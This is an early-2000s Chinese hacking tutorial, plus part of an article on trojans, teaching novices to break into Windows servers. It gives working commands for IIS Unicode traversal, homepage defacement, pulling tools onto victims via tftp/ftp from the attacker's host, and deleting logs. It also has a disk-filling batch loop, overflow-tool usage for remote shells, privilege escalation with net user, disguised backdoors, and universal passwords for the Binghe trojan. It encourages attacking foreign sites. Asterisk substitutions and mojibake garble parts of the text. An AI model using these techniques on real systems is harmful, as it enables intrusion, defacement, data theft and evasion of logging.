　　本文例子均以win2k为准，其他类型请自行替换。

　　基础知识（3）

　　二，一切从基础开始

　　由于winnt\system32\cmd.exe的存在，使远程执行命令变为可能，在浏览器里输入以下请求：(假设11.11.22.22有漏洞）

　　11.11.22.22/scripts/..

　　学过dos的应该可以看懂，其实就是利用当中的非法请求使我们可以连到system32下，如果inetpub\目录不合winnt同盘，或者目录级数有改动，可能会引起请求失败。

　　如果成功，那么在浏览区可看到如下信息：

　　Directory of C:\inetpub\scripts

　　2000-09-28 15:49 〈DIR〉 .

　　2000-09-28 15:49 〈DIR〉 .. （假设目录中没有文件，实际上有一大堆）

　　是不是有自己机器的感觉了，正点！就是这种感觉！

　　cmd.exe相当与dos里的command.com，因此，我们可以执行很多命令了！

　　 ... em32/cmd.exe/c+dir （这个命令同样道理）

　　大家请注意：/c后面的+，实际上，他就是空格，请记牢！dir开始就是dos命令了，我们可以更改一下：

　　11.11.22.22/scripts/..

　　会dos的朋友一定懂其意义了，不懂的请去看书 .

　　不用说，大家也知道我们就可以利用它来对有漏洞的机器展开攻击了！

　　三，实战演练

　　1，修改主页！（是不是很爽？）

　　一般主页位置在c:\inetpub\wwwroot下，但要是改了路径，就需要找找了。

　　最方便的 *** ：在浏览器里输入 要是有漏洞，那在浏..皇俏颐堑氖籽　/a>

　　分析法：用dir看各个盘符的根目录，看可疑的就进去看，运气好的在一分钟里找到，这要看运气和直觉。

　　dir/s 法：首先在看其主页，找个图片或连接，看它的文件名，比如，11.11.22.22首页上有一幅图片，右击，属性，看到了吗？iloveu.gif，然后我们利用unicode输入这条命令dir c:\iloveu.gif /s意味着查找c盘下所有目录里的iloveu.gif，注意实际应用时别忘了把空格改为+,如果没有继续找d盘，很快就能确定主页目录的。

　　找到了目录，就要对它开刀了！一般默认收页为index.htm,index.html,index.asp,default.htm,defautl.html,default.asp中的一个，现在我们确定11.11.22.22中为index.htm

　　那么我们就修改它吧！

　　最方便的 *** ：echo法。echo是一个系统命令，主要用于设置回应开关，而echo cshu >c:\autoexe.bat就是把cshu加入autoexec.bat里并删除原有内容，echo cshunice >>c:\autoexec.bat就是加入cshunice但不删除原有内容，这样我们就可以逍遥的改了。

　　11.11.22.22/scripts/..>c:\inetpub\wwwroot\index.htm

　　回应为：HTTP 500 - 内部服务器错误

　　通过对cmd的分析，袁哥得出一条简便的 *** ，加入"符号

　　11.11.22.22/scripts/..".exe/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm

　　11.11.22.22/scripts/..".exe/c+echo+2001730+>>c:\inetpub\wwwroot\index.htm

　　回应为：cgi错误，不用理会

　　两条命令一下，呵呵，再看看11.11.22.22，是不是烙上我们的大名了？不错吧

　　而在实际操作中，可能袁哥的 *** 也会失效，这时，我们就可以copy cmd.exe 为另一个exe，记住路径，用copy后的来echo

　　例如：11.11.22.22/scripts/..

　　11.11.22.22/scripts/..>c:\inetpub\wwwroot\index.htm

　　2,上传法：echo有点不讲道理，把人家的文件破坏了，要是想在主页上增光添彩，那就应该用改好的主页

　　基础知识（4）

　　上传，这个我们后面介绍。

　　几点忠告：

　　1，对于没有主页的机器（就是正在建立的主页），不要改它，这很没水准，也很没道德

　　2，echo前记得帮他们做好备份

　　3，不准在主页里加入恶性语句

　　2，下载文件

　　要是有什么有用的文件被你发现，那我们如何下载呢？

　　最简单的 *** ：把文件copy至网页目录下。copy c:\email\baby.eml c:\inetpub\wwwroot\baby.zip,然后，下载11.11.22.22/baby.zip就行了，注意！实际应用中要记得对文件名进行修改，总之不能暴露。

　　别的 *** ：对不起，没想好：）

　　3，最重要的上传

　　一般 *** ：ftp法

　　首先建一个ftp脚本文件：c:\hehe.haha（名字乱取把），申请一个ftp账号，然后用echo吧

　　echo+open ftp.cshu.com（ftp主机） > c:\hehe.haha

　　echo+user yourname >> cc:\hehe.haha (yourname是用户名)

　　echo+yourpasswd >> c:\hehe.haha (yourpasswd是密码)

　　echo+get setup.exe >> c:\hehe.haha 要下载的文件

　　echo+quit >> c:\hehe.haha

　　完了以后：ftp+/s:c:\hehe.haha,由于是ftp主机，那么速度一定很快，过一会setup.exe就会出现在当前目录了（也就是cmd所在目录）

　　别忘了先上传到ftp主机，不要做马大哈哦！

　　最简单的 *** ：tftp法。

　　这种 *** 不用中转服务器，首先准备一个tftp服务端，它的作用就是把你的机器做成一个tftp服务器，利用漏洞机器来下载（注意，运行tftp时不要运行其他的ftp软件）

　　在这里我推荐cisco tftp server，自己去找找把，实在没有来找我：）

　　安装好后运行，别忘了设置好默认目录，否则会找不到文件

　　tftp命令：tftp -i 1.2.3.4 GET ihateu.exe c:\winnt\ihateu.exe（ihateu.exe在默认目录里）

　　1.2.3.4为你的ip，用unicode运行一下，会看到tftp server里有反应了，这就好了，不一会，文件就传上去了，方便把！

　　学会了上传，我们就可以好好改主页，还可以上传木马，还可以把程序放上去运行…………（运行程序和在dos里一样）

　　4，如何清除痕迹

　　虽然国内主机纪录ip的不是很多，但万事小心为妙，unicode权限达不到admin。用cleaniislog行不通，就…………直接删吧！

　　C:\winnt\system32\logfiles\*.*

　　C:\winnt\ssytem32\config\*.evt

　　C:\winnt\system32\dtclog\*.*

　　C:\winnt\system32\*.log

　　C:\winnt\system32\*.txt

　　C:\winnt\*.txt

　　C:\winnt\*.log

　　全……擦掉！

　　四，细节问题。

　　1，遇到长文件名怎么办？

　　c:\program files\

　　就用c:"program20%files"\

　　2，遇到空格怎么办？

　　%代替喽，或者xx yy=xxyy~1

　　基础知识（5）

　　%代替喽，或者xx yy=xxyy~1

　　3,如何做个很大的文件？

　　目的就是破坏啦！我不喜欢不过教教你们啦

　　@echo off

　　echo big > c:\a.a

　　:h

　　copy c:\a.a+c:\a.a c:\a.a

　　goto h

　　注意不要乱来啊！

　　4，输入命令，没反应或反应不对。

　　：）请检查检查再检查命令的正确性，可能没有漏洞，那就闪人！看在你看到这里那么给我面子的份上，在给你几个吧！

　　 ... macr;..à

　　ˉ :\ 或 ... 2/cmd.exe/c+dir+c:\ 或 ... 2/cmd.exe/c+dir+c:\ 或 ... 2/cmd.exe/c+dir+c:\

　　不一定有用哦！

　　5，如何找到unicode漏洞的主机

　　呵呵：）更好的 *** 自然是………………一个一个ping,一个一个试喽：）

　　不要打我呀！我说我说。更好找一个cgi扫描器，unicode查找器多如牛毛，随便找个吧！

　　6，我copy，del文件，怎么显示aceess denined

　　这个不好办了，由于unicode所拥有的权限有限，出现上述情况很正常，我们要做的便是提高自己的权限！

　　这个我会在今后介绍，现在你可以试试attrib

　　attrib -r -h -s c:\autoexec.bat

　　再对autoexec.bat进行操作，看看有没有效果，成功率不高，不好意思！

　　7，我黑了主页，天下无敌？

　　我本来想对你说：“见你的鬼去吧！”不过想想不大礼貌，有失我绅士风度，所以改个口

　　echo主页或改主页在不懂黑客的人看起来很了不起，不过，它最多算是一个基础，拿到admin才是我们的终极目标！

　　对cshu全体成员来说，不准去改正在建立的网页！这是我们的原则！

　　要是你想耍耍威风，那也可以理解，那就去黑外国的，或者url欺骗也是个好选择

　　8，我如何做更多的事？

　　之一，努力提高权限

　　第二，由于cmd的限制，我们可以做的不多，那就要程序帮忙，上传吧！切记，要隐秘！

　　一，frontpage扩展攻击。

　　为什么把它放之一位呢？原因很简单，它最最方便，frontpage服务器扩展是一种方便的远程站点管理功能，可是由于某些网管注意文明用语的疏忽（为什么注意文明用语满街飞？）不设置访问密码，如果那样的话，我们只要用一个frontpage就可以黑它了！这完全不是黑客工具，但它确实办到了，还要感谢注意文明用语网管和微软啊！

　　具体做法：

　　1，准备frontpage，我是用dreamweaver的，但它不能黑啊：）更好是2000版，只是不要是老掉牙的版本就行了。

　　2，找一台有frontpage扩展的主机，可以用流光，也可以用搜索引擎查找/_vti_pvt/，这是frontpage扩展的标志。

　　3，接下来打开frontpage,(妈妈：你在干什么？回答：做网页！妈妈：好孩子！）文件菜单下选择“打开站点”，然后在文件夹框里写入 我习惯用这个做例子，以...僮魍澄募恕/a>

　　4，万一跳出错误信息，表示有密码（这个不算注意文明用语）这时我们试着用以下url, 这...盎箍梢愿耐场/a>

　　我的看法：

　　这个漏洞只能说明网管的疏忽，对我们而言是没有什么利用价值的，只可以改改网页，也许这也够了，但要进一步控制主机，此漏洞就无能为力。消遣时可以玩玩。

　　二，iis.printer溢出攻击

　　据说缓冲区溢出攻击是黑客入侵时70%所选的 *** ，看起来有点夸张，但确实有道理，因为暴力密码破解在 *** 上变得非常之慢，而像unicode的解码漏洞所取得的权限又太低，而缓冲区溢出一般可取得system权限，是非常有用的！

　　具体原理我也不是很清楚，只能说个大概：当我们向系统发出超出缓冲区大小的数据处理请求时，便会引发溢出，并弹出错误对话框，我们常看到的“非法操作”其实也是可能是由于溢出。而当溢出时，eip发生错误，有汇编知识的朋友应该记得，eip是控制执行代码的位置（顺便问一下，有没有会crack的高人，记得做我老师）这时加入一段恶性代码，算好发生溢出时的eip值，这样溢出时就会执行恶性代码而不是当掉。非法操作我们知道多的不得了，因此……溢出攻击是非常强大的！

　　由于汇编对于我们来说较难掌握，加之对溢出的了解很有限，那么我们只能借助高手们的程序来黑了。

　　具体 *** ：

　　1，准备iishack，本站有下载，该版本可以对多种系统进行攻击。

　　2，用x-scan或流光扫描一个有iis.printer漏洞的主机，然后就可以攻击了。

　　3，在命令行方式执行iis5hack (主机ip) (端口号，默认80）（系统代号，具体可参考程序的说明） （ shell口）

　　例如：iis5hack 11.11.22.22 80 1 111(以为在111端口开一个shell)

　　4,用nc或telnet连上，nc/telnet 11.11.22.22 111,成功的话就可以控制机器了，加个用户，做个 *** ……

　　我的看法：

　　这算是一个比较有用的漏洞了，它能帮助我们取得system权限，其实和admin差不了多少了，对于做一台跳板是非常有利的，希望大家熟练掌握。

　　三，idq/ida漏洞溢出攻击

　　这是时下很热门的了，原理和上面的printer相似，目前我只找到了iis5的攻击程序，在cshu里也可以找到的，我们准备的是snake的gui版本，很方便的。

　　具体 *** ：

　　1，准备snakeiis溢出程序。可以从本站下载。

　　2，ida/idq漏洞很多的，但win2k的服务器就不是那么普遍了，所以用你熟练的扫描器去找一打win2k的机器吧。

　　3，程序的界面是很傻瓜的，把ip填入，选择好类型，按下溢出按钮，显示shellcode发送完毕。

　　4，telnet/nc到你设定好的端口，如果成功的话，会显示目录下的信息（因为默认shellcode是dir)

　　5，欢呼吧！再次溢出，别忘了改shellcode为你想要的代码哦。

　　6，重复4，很快一台新鲜的win2k被你控制了！

　　我的看法：

　　我很喜欢用这种攻击，因为win2k的3389可以很方便的为我做事，省力地搞到一台win2k，然后慢慢享用，爽到根尖细胞啊！大家应该掌握这项 *** 。

　　四，*bsd telnetd溢出攻击

　　又是溢出，不过这个可是真正的热点哦，最近红盟等大型安全网站被黑就是因为这个！所以看看吧

　　具体 *** ：

　　1，使用fbsdhack for win2k来攻击，本站有下载的

　　2，还是要找到这样的主机，一般是xnix的，比较少的，用专门的扫描器吧，我会在不久放出来。

　　3，等吧！这个漏洞要发送的信息很大，大约16mb,可怕吧，所以更好用高速肉鸡

　　4，有幸成功了，记得请我吃饭！

　　我的看法：

　　这个漏洞的利用比较有难度，从找机器开始就是。但作为黑客爱好者，我们没有理由去回避它！

　　五，密码暴力破解

　　这是最最原始，也是最最基本的攻击的方式了，利用字典文件或暴力模式，对密码进行探测。费时费力，但若有经验的话，可以缩短这一过程。

　　具体 *** ：

　　1，找一个破解器，有ftp,http, *** tp,pop3,telnet等等类型。

　　2，找到一台相应的主机。

　　3，设定一番，上路吧！你可以睡觉，可以去machine(就是做作业)，可以去泡妞……就是不要傻等。为什么呢？因为会伤视力的：）怎么倒了一片，起来起来！

　　4，万一成功了（之所以用这个词，是因为成功率很低的）表明你运气旺，赶紧下线，买彩票去吧

　　大家好，这几天被cgi程序搞得头昏脑胀，主要还是51的错，什么破东西，那么多错误！现在只好暂时借人家的地方用。

　　这是菜鸟操的最后第二节，说实话我还可以写很多的，但是作业还欠了一大堆：（为什么我没有满舟的狗屎运？算了算了，我不合那种欺世盗名之辈一般见识，开始做操吧！

　　不知道大家对unicode和溢出攻击是不是熟练了？没有的要加油哦！今天我们来谈谈权限的提升。

　　在windows系统中，更高的权限掌握在administrators的手里，在xnix中称为root,我们要完全掌握一台机器，拿到admin是不可或缺的。

　　首先说说最简单的:system to admin

　　当我们用溢出攻击成功后，其实我们已经拿到了system权限（具体看每种攻击而可能有所不同）这时我们很容易拿到admin权限。首先看看一下命令：

　　net user 察看用户表 net user username pass /add(添加密码为pass的用户username)

　　net localgroup 察看组 net localgroup guests cshu /add 把cshu用户加入guests组

　　net use \\ip\ipc$ "password" /user:username 这是远程连接的命令

　　假如我们溢出了11.11.22.22，那么这样做吧！

　　net user （看到了iusr_machinename的用户了，它一般没什么权限的）

　　基础知识（6）

　　net user iusr_machinename cshu （把它的密码设为cshu）

　　net localgroup administrators iusr_machinename /add（加入administrators组）

　　这样我们就拥有了iusr_machinename这一账号，admin权限，简单吧！

　　熟悉一下net use 命令：

　　net use \\11.11.22.22\ipc$ "cshu" /user:iusr_machinename 建立连接

　　copy c:\haha.exe \\11.11.22.22\admin$ 把haha.exe 复制到机器c:\winnt\system32上，若是c$.d$,就表示c,d盘

　　net time \\11.11.22.22 看到了时间了，比如是8点

　　at \\11.11.22.22 8:03 haha.exe 就会在8点3分执行。

　　net use \\11.11.22.22 /delete 断开连接

　　应该是很简单的。这样我们就可以随心所欲地操作11.11.22.22了，admin是更高权限，所以没有限制的：）

　　是不是很简单？所以我是溢出是很厉害的攻击 *** 。

　　3389知道吧！如果能进入，那么用上面的命令也可以轻易拿到admin的，不过呢，有3389漏洞的机器已经不多了。看你运气了！（本站有几篇关于3389的好文章）

　　总的来说，还是unicode的机器最多，为什么注意文明用语网管不会灭绝呢：）虽然unicode拿admin有一定难度，但还是要试试的。

　　首先，我们检查一下unicode在这台机器上的权限，一般看读写权限和运行权限。用copy 或del命令便可确定读写权限，然后上传文件运行一下便可知道运行权限。

　　1，如果我们可以对winnt\repair和winnt\config进行访问，sam文件就在里面（win2k里是sam，nt4里是sam._）那么用tftp 把get改成put下载下来，或者把它复制到inetpub\wwwroot下，改成zip下载。

　　拿到sam后，用lc3破解版暴力破解吧，这种 *** 比较费时。

　　2，要是有运行权限，拿就抛个木马上去吧！虽说木马可能也会没有权限，但自启动的模式在admin登陆后可能会自己提升了权限。要注意的是，更好放最新的木马，因为木马很容易被杀毒软件查杀！

　　3，其实和2差不多，只不过变成了键盘记录器，选个国产的，一般杀毒软件不会杀出来，认真配置好后传上去，下线睡觉或是做家务去！等到网管用了机器，密码就会被纪录下来，我们在去取，admin就顺利到手了：）

　　4，getadmin和pipeupadmin，前者是nt4用的，后者是2000。看看帮助知道使用 *** 后（其实猜都猜得到）就可以提升一个用户的权限，有一步登天的感觉！

　　5，手工做个bat文件，里面是建立用户等命令，然后把它放到自启动下，有很多途径：documents and settings下的开始菜单下的启动，知道了吧，至于要顺利放进去的话，会遇到空格长名等等问题，就看你的基本功了。win.ini里有load，加进去。还有便是注册表，好好研究一下regedit.

　　6，本地溢出。这个比较高深，我能告诉大家的只是，去四处找找本地溢出程序。

　　总的来说，unicode改主页是非常简单的，但是若是要取得更高的权限，就要一番努力，上面的 *** 只是些思路，实际操作时需要具体处理，开动脑筋，把 *** 都结合起来。（是不是听起来有点玄？）

　　想想好像没有什么其他的途径要说了，什么？linux,呵呵，我还不大懂，就不在这里瞎说了。

　　那今天就说到这里了，6里面我会说说后门 *** ，小问题和我的一点经验。期待吧！

　　这是最后一节了，写的傻傻的，但我毕竟坚持下来了，值得鼓励！（偶尔阿q一下）在写菜鸟操的同时，我们的cshu(cshu.TT86绿色上网!)也在默默成长，但现在我要准备离开了，真是有点舍不得。在今后的日子里，还请大家多多支持cshu和christ,freedom他们。

　　今天说点什么呢？没有主题，乱谈一通吧！

　　首先我要吐一次血，当然是为了推荐一样东西，就是流光！（那么没创意，老土！）不管怎么说，小榕的流光应该是中国之一黑软，他综合了诸多的攻击手段，使攻击便捷化，当然可能让我们养成了懒惰的习惯。不会用流光的更好去学学。

　　我来说说我自己觉得最有用的几个项目：

　　1，探测----扫描pop3/ftp/nt/sql主机，要是无目的地黑，那么用这个再合适不过了。进去后填好ip范围（范围可以扫大一点，它很快的），至于类型嘛，要是你要一大堆unicode，那么选择iis/frontpage再合适不过了，要是要更高的权限，sql是不错的选择。完成后，表格里会多出一大堆东西。

　　remote execute-x 这是几种不同的unicode，用它比用ie来执行方便多了，但是echo有问题（是我自己不会，会的朋友快教我）

　　remote ftp pcaw file method-x 这是远程获取pc anywhere的密码文件，要使用的话，你首先要有一个ftp账号，去申请吧！顺利拿到cif文件后，用流光自带的工具就可以解开密码，很爽的！

　　remote ftp sam -x 拿sam的，还是用更好的lc3来解吧！

　　frontpage extended 这是frontpage扩展，不过不要高兴，是要密码的。但是若是后面跟了privilege hole的话，放声大笑吧！（小心不要让邻居拿着菜刀冲进来）打开frontpage，打开站点， 就可以了！（不要忘）

　　此外还有一点变通，大家肯定读的懂的。

　　2，探测----高级扫描工具。这可是流光4中的重头戏，综合了很多漏洞，还可以用plugin功能加入新的漏洞。这项功能很适合对某一站点进行探测，很快扫出漏洞后，流光会生成一个报告文件，其中包含漏洞的连接，要是你看不懂的话，建议你拿出x-scan，里面有漏洞描述的。

　　3，工具----nt管道远程命令，种植者，这两项功能对我们攻击nt来说是相当好用的。但前提是要有账号，相信在此之前你应该有几个了吧，那就快点试试吧！

　　总的来说，流光的使用是非常简单的，其中也有不少工具值得我们一用，tools目录里有一些很好的工具，exploit里则有很多溢出攻击程序，前提是你应该会c,不会的话我也没办法，学会c起码要看10倍于菜鸟操的资料吧！另外给大家推荐一个站点：有什么漏洞的话就去那里找找，你会有所收获的。

　　然后我想说说一些黑站的经验。

　　☆当我们用unicode控制一台机器时，我向大家推荐用asp木马，阿新的改良版，本站有下载的。上传asp文件前不要忘了修改list.asp中的地址信息，更好也放一个cmd.asp上去，运气好的话，可以运行命令的。

　　上传好后，ie里输入其中index.asp的地址，呵呵，我们就能方便地管理其中的文件了，可以改网页，改代码，上传脚本文件麻烦？那就用它来生成吧！

　　推荐他的更大原因便是----便于隐藏！一般网站总有一个庞大的目录，选择一个深的，放进去，网管很难发现的：）

　　最后对大家说一句，要是有备份目录（很多网站都有的），更好也放一份进去。有一次我用这个东西修改一家网站的首页，改了两三次网管也没删掉，可是突然一天不行了，原来他用了备份的网页（还算机灵吧）

　　☆ 我想对大家说，对于国内网站，更好不要恶意去攻击，因为我们是中国人嘛！在5/1期间，我发现有一些国内站点被黑，留下的页面上不是poison box，而是中国人的话，这真是 *** 到了极点！大家千万不要学哦。还有，现在网上有很多还没有网页的主机，往往有很多漏洞，对于这种机器，竟有一些小人也会去改收页（比如上海那个姓杨的小子）这算什么？显示实力，炫耀技术？呵呵，见鬼去吧！

　　我的建议是，不要改它的首页，而是努力去拿admin,控制它，这样我们有很多选择：肉鸡，等它有正式主页后可以黑，或者把我们的主页放上去！比申请好多了，权限又足！当然很危险：）这样做是不是有品位多了？

　　☆要是我们拿到了admin，但有时却不能执行一些命令，那很可能是因为服务启动的问题。试着用以下命令：

　　net start termservice 启动win2k的终端控制

　　net start workstation 打开net use 功能

　　net start lanmanserver 打开ipc

　　net start eventlog 启动日志（你不会那么傻吧！stop）

　　net start schedule 打开计划(at)

　　net start server 共享

　　还有很多，net命令里去找吧！

　　☆打开telnet

　　1，远程去运行ntlm.exe，流光里有

　　2，net stop telnet

　　3, net start telnet

　　☆我推荐几种后门：winshell（默认端口5277）相对于srv，它好一些。remotenc这个是榕哥的作品，可以以指定用户执行，还可以自己起服务的名字，很棒的！

　　至于服务的名字，建议大家去看看win2k的进程名，学着起相类似的名字，要做到使网管看到了也不会引起警觉，或是有警觉也不敢去删，呵呵，这样就更好了！

　　☆ *** 问题。我推荐大家自己去做 *** ，控制了一台机器后，用snake前辈写的skserver去做个sock5。

　　具体做法就不详细说了，因为比较普通，只要熟悉一下用法就可以了。

　　做好了sock5，我们可以上oicq，下棋都用它，sock5 *** 可是很少见的哦！

　　要是实在拿不到sock5,用http也可以，这里推荐一个软件tcp2http，它具有很多功能。在给个站点：dzc.126.com国内最更好的的 *** 站点，怕死的朋友千万不要错过。

　　最后说说一些对于菜鸟同志的建议：

　　不要把黑当作一种显示自己的行为，要是你想耍威风，用url欺骗来骗mm最合适了，还可以弄个yahoo什么的……

　　不要在一项技术上停留过长时间，当你熟练掌握后，应该迅速学习下一个新技术。

　　不要和被你黑的网管过多接触，前车之鉴哦。

　　对于一台好机器要做好后门，不要轻易失去它。

　　想好好学黑客的话，就常去各大论坛转转，仔细读教程，忘记聊天室和 *** 游戏吧！

　　实践是更好的教程，再次重申！

　　应该多学计算机的其他方面的知识，任何知识在一定场合都是有用的。

　　编程技术……好像太难了，不过再难也要学。

　　想不出来了………………

　　好了，我们的菜鸟操终于结束了，我这个大菜鸟也可以退休了，拼搏一年后我会回来的。之一节里我曾许诺让大家学会黑站，不知道大家是否成功了，不管这么样，我们都该不断的努力学习，不是吗

　　黑客常用兵器之木马篇（上）

　　“我知道远程控制是种武器，在十八般兵器中名列第七，木马呢”

　　“木马也是种武器，也是远程控制。”

　　“既然是远程控制，为什么要叫做木马？”

　　“因为这个远程控制，无论控制了什么都会造成离别。如果它钩住你的E-Mail，你的E-Mail就要和你离别；如果它钩住你的 *** ，你的 *** 就要和你离别。”

　　“如果它钩住我的机器，我就和整个 *** 离别了”

　　“是的。”

　　“你为什么要用如此残酷的武器”

　　“因为我不愿被人强迫与我所爱的人离别。”

　　“我明白你的意思了。”

　　“你真的明白”

　　“你用木马，只不过为了要相聚。”

　　“是的。”

　　一

　　在众多的黑客武器中特洛伊木马（Trojan horse）这种攻击性武器无论是菜鸟级的黑客爱好，还时研究 *** 安全的高手，都视为更爱。虽然有的时候高手将木马视为卑鄙的手段。但是作为最为有效的攻击工具，木马的威力要比其他的黑客工具大得多。

　　“木马既然如此有效，为何在Hacker兵器谱中排名靠后？”

　　“因为使用木马往往不是很光明正大。”

　　“哦？为何？”

　　“在使用木马的人群中菜鸟黑客居多，他们往往接触 *** 不久，对黑客技术很感兴趣，很想向众人和朋友显示一番，但是去驾驭技术不高，不能采取别的 *** 攻击。于是木马这种半自动的傻瓜式且非常有效的攻击软件成为了他们的更爱。而且随着国产化的木马不断的出现，多数黑客的入门攻击几乎无一例外都是使用木马。当然对于那些黑客老手来说他们也并不是不使用木马了，他们通常会在得到一个服务器权限的时候植入自己编写的木马，以便将来随时方便进出这台服务器。”

　　“但如此一来木马的名声不就随之降低了吗？”

　　“是的，所以现在的黑客高手都耻于用木马，更耻于黑个人的计算机。”

　　“不过木马在很多人的眼中仍然是一等一的绝好兵器。”

　　在众多的木马之中Cult of Dead Cow开发的Back Orific2000应该算是名气比较大的一个。这款软件是在Back Orific2.1的基础之上开发的，但是他更大的改动就是增加了对Windows NT服务器系列的支持。作为微软的高端产品，BO2000的这个功能无疑对Windows NT来说是致命的，就Windows NT本身而言，由于硬盘采取了NTSF的加密，普通的木马，包括冰河也无法控制，当然要想要让多数木马无法对Windows NT发挥作用更好将Windows NT转化为NTSF的格式下才会比较好用一些。

　　而正因为如此BO2000才深得黑客高手的喜爱，因为他们感兴趣的也只有服务器，也只有Web Server才能够提起他们的胃口，那是一种来自深层感官的 *** 。

　　通常情况下木马大致可分为两个部分：服务器端程序和客户端程序。服务器端通常就是被控制端，也是我们传统概念上的木马了。

　　二

　　“你说BO2000好，但是绝大多数的杀毒招数都能够沟将其制服，而且我感觉他在使用上不如我手里的冰河锐利，况且我也不想黑什么服务器。我认为，个人电脑中隐藏有更大的宝藏，而且个人电脑脆弱的我能够利用任何一种 *** 摧毁它。

　　“你说的很对，冰河确实锐利，而且称霸中华江湖一年之久，也可谓武林中少见的好兵刃，但是兵器虽然锋利，但兵器在打造的时候却留下来一个致命的缺点，这也是木马冰河为何在武林衰败的原因。”

　　“这是一个什么样的弱点那？竟然如此致命？”

　　“呵呵，说白了也很简单，冰河的作者在打造冰河2.X版本时就给它留下了一个后门，这个后门其实就是一个万能密码，只要拥有此密码，即便你中的冰河加了密码保护，到时候仍然行同虚设。”

　　“什么！真有此事？想我许多朋友还因为冰河好用把它当作了一个免费的远程控制程序来用，如此这般，他们的机子岂不暴露无遗？”

　　“呵呵，在黑客中瞒天过海、借花献佛这些阴险的招数都不算什么，多数木马软件的作者为了扩大自己的势力范围和争取主动权都会留一手，致命的一招。冰河的作者当然也不例外，而且由于作者钟爱许美静，所以每一个冰河中都包含许美静的歌词。当然作者为自己以后行事方便也留了几个万能密码。”

　　“噢？万能密码？”

　　“通常黑客在植入冰河这种木马的时候，为了维护自己的领地通常的要为自己的猎物加一个密码，只有输入正确的密码你才能够正常的控制对方的计算机，但是冰河的打造者为了方便自己的使用在冰河中加入了一个万能的密码，就像万能钥匙一样。冰河各版本的通用密码：

　　2.2版：Can you speak Chinese

　　2.2版：05181977

　　3.0版：yzkzero!

　　4.0版：05181977

　　3.0版：yzkzero.TT86绿色上网!

　　3.0版：yzkzero!

　　3.1-netbug版密码: 123456!@

　　2.2杀手专版：05181977

　　2.2杀手专版：dzq20000!

　　你可以试试看，是不是很轻松的就能够进入任何一台有冰河服务器端的电脑？”

　　“真的进入了，果然有此事情，怪不得现在很多人都不再使用冰河。”

　　“此外冰河还存在着两个严重的漏洞：

　　漏洞一：不需要密码远程运行本地文件漏洞。

　　具体的操作 *** 如下：我们选择使用相应的冰河客户端，2.2版以上服务端用2.2版客户端，1.2版服务端需要使用1.2版客户端控制。打开客户端程序 G_Client，进入文件管理器，展开“我的电脑”选中任一个本地文件按右键弹出选择菜单，选择“远程打开”这时会报告口令错误，但是文件一样能上传并运行。

　　任何人都可以利用这个漏洞上传一个冰河服务端就可以轻松获得机器的生死权限了，如果你高兴的话，还可以上传病毒和其它的木马。

　　漏洞二：不需要密码就能用发送信息命令发送信息，不是用冰河信使，而是用控制类命令的发发送信息命令。”

　　“当然这的确是一个原因，但更主要的是现在的多数杀毒软件都能克制冰河。”

　　三

　　木马通常会在三个地方做手脚：注册表、win.ini、system.ini。这三个文件都是电脑启动的时候需要加载到系统的重要文件，绝大部分木马使用这三种方式进行随机启动。当然也有利用捆绑软件方式启动的木马，木马phAse 1.0版本和NetBus 1.53版本就可以以捆绑方式装到目标电脑上，可以捆绑到启动程序上，也可以捆绑到一般程序的常用程序上。如果木马捆绑到一般的程序上，启动是不确定的，这要看目标电脑主人了，如果他不运行，木马就不会进入内存。捆绑方式是一种手动的安装方式，一般捆绑的是非自动方式启动的木马。非捆绑方式的木马因为会在注册表等位置留下痕迹，所以，很容易被发现，而捆绑木马可以由黑客自己确定捆绑方式、捆绑位置、捆绑程序等，位置的多变使木马有很强的隐蔽性。

　　“在众多木马中，大多数都会将自己隐藏在Windows系统下面，通常为C:\Windows\目录或者C:\Windows\system\与C:\Windows\system32下隐藏。”

　　“众多的目录中为何选择这两个目录？”

　　“呵呵，当然是为了便于隐蔽。通常这几个目录为计算机的系统目录，其中的文件数量多而繁杂，很不容易辨别哪些是良性程序哪些是恶性程序，即便高手往往也会有失误删除的情况。而且，即便放置在系统目录下，就多数为重要的文件，这些文件的误删除往往会直接导致系统严重的瘫痪。”

　　“原来如此。”

　　“前辈，木马冰河是否也做了这些手脚？”

　　“这是自然，木马一旦被植入目标计算机中要做的最重要的事就是如何在每次用户启动时自动装载服务端。冰河也是如此了。首先，冰河会在你的注册表中的 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run和 RUNSERVICE 键值中加上了\kernl32.exe(是系统目录)，

　　§c:\改动前的RUN下

　　默认=""

　　§c:\改动后的RUN下

　　默认="C:\\WINDOWS\\SYSTEM\\Kernel32.exe"

　　§c:\改动前RunServices下

　　默认=""

　　§c:\改动后RunServices下

　　默认="C:\\WINDOWS\\SYSTEM\\Kernel32.exe"

　　§c:\改动前[　　HKEY_LOCAL_MACHINE\Software\CLASSES xtfile\shell\open\command]的：

　　默认="Notepad.exe %1"

　　§c:\改动后[　　HKEY_LOCAL_MACHINE\Software\CLASSES xtfile\shell\open\command]的：

　　默认="C:\\WINDOWS\\SYSTEM\\Sysexplr.exe %1"

　　可以看出之所以冰河可以自我恢复主要靠的是C:\\WINDOWS\\SYSTEM\\Sysexplr.exe，而且冰河服务器端的编制是加密的，没法简单的通过改注册表得到或换掉。另外值得一提的是，即便你删除了这个键值，也并非平安大吉，冰河还会随时出来给你捣乱，主要因为冰河的服务端也会在c:\ windows目录下生成一个叫 sysexplr.exe文件，当然这个目录会随你windows的安装目录变化而变化。

　　“这个文件名好像超级解霸啊，冰河竟然如此狠毒。”

　　“哈哈哈哈，你说的很对，也很聪明，这个文件的确很像超级解霸，但是这还是不够称得上为阴险，最为阴险的是这个文件是与文本文件相关联的，只要你打开文本，sysexplr.exe程序就会重新生成一个krnel32.exe，此时你的电脑还是被冰河控制著。而且如果你失误将sysexplr.exe程序破坏，你计算机的文本文件将无法打开。”